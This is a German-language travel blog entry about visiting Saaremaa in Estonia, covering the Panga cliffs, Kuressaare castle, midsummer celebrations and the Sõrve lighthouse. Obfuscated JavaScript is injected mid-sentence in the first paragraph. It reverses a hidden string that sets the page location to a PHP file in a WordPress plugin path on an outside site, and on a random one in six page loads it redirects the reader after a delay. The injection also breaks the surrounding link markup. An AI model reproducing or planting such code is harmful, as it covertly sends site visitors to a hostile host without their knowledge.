Unsere Reise führt uns vom Festland von Estland auf die vorgelagerten Inseln. Wir besuchen tort $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonia” href=”http://www.saaremaa.ee/index.php?option=com_content&view=article&id=498&lang=en&Itemid=257″ target=”_blank”>Panga (Panga Pank), welche 30 Meter hoch sind, echt eine Attraktion für das flache Estland. Dann die wunderschöne und gut erhaltene tonia.com/de/object/3139″ target=”_blank”>Burg von Kuressaare.
Dieses Wochenende ist das Sommersonnenwendefest, welches für alle Esten und Nordländer ein Feiertag ist. Dieses Midsommerfest oder auch Mittsommer (Sommersonnenwende) wird auf Saaremaa traditionell am Panga Pank gefeiert. Eintritt Euro 6.- und dann wartet ein schönes Festgelände mit Riesenfeuer.
Am 23. Juni ist in Kuressaare dann noch das Unabhängigkeitsfest. Auch hier wird am Strand ein Riesenfeuer mit Lunapark und Unterhaltung geboten.
Wir besuchen am selben Abend noch die Südspitze von Sääre mit dem Leuchturm Sõrve. Es ist jedoch doch etwas wolkig und düster, so dass wir hier keine Fotos machen können.